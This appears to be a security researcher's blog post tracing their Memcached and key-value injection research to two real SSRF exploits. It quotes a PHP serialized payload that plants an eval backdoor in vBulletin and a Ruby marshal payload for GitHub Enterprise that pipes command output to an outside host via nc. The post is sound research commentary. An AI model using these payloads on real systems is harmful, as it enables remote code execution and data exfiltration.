SSRF, Memcached and other key-value injections in the wild
Back in 2012 we released SSRF a different techniques to exploit Memcached servers and other services with host-based authentication through SSRF.
Two years after, in 2014, I presented a Memcached injection techniques at Black Hat USA https://www.blackhat.com/docs/us-14/materials/us-14-Novikov-The-New-Page-Of-Injections-Book-Memcached-Injections-WP.pdf. There I mentioned that it’s possible to exploit it as a Remote Code Execution vulnerabilities in case of the data unserialization at application side.
Then in 2016 I released the same approach for other key-value databases, such a Redis, Riak, CouchDB (http://www.syscan.org/slides/2016_SG_Ivan_Novikov_Key-value_injections_here.pdf)
And I am very pleased that all these studies were not in vain!
Two years ago (2015) we registered the first public exploit for vBulletin which used an SSRF vulnerability to inject arbitrary serialized data into Memcached. Here it is:
The payload there looks like:
set pluginlist 0 0 96
a:1:{s:12:"global_start";s:62:"if(isset($_REQUEST['eval'])){eval($_REQUEST['eval']);die();}";It’s a PHP serialized data that is putting into the Memcahed key “pluginlist”. Value from this key will be read by vBulletin then unserialized and executed.
This year the second SSRF/Memcahed exploit was released. It’s a GitHub Enterprise vulnerability
https://www.exploit-db.com/exploits/42392/
The payload listed below:
set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 <LEN>\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`id | nc orange.tw 12345`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult
As you can see, it’s a Ruby marshal serialized data. The payload is almost the same as previous one but with the different serialization format.
So, it’s really cool that my previous research found some practical applications. I hope that somebody will find smth with a Python/Pickle finally ;)
Enjoy!
